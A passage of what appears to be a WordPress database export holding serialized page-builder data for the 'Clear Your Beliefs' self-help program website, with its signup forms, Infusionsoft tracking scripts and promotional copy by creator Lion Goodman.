src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1364, 1811, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1529:"<p>[su_box title="Free eBook" class=''three-container'' box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><br /> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1839:"[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]\n<center>\n	<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1">\n	<strong>DOWNLOAD the FREE APP</strong>\n</p>\n<p class="tri-panel-p tri-panel-2nd-p-2">\n	Start Clearing Whatever Is In The Way Right Now!\n</p>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST">\n	<input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n	<div class="form-input-container-button">\n		<input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" />\n	</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST">\n	<input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" />\n	<input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" />\n</div> \n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1208:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br><br><br><br>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1363, 1810, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1505:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><br /> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1208:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br><br><br><br>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:95:"<p>[su_posts template="templates/single-post.php" post_type="attachment" 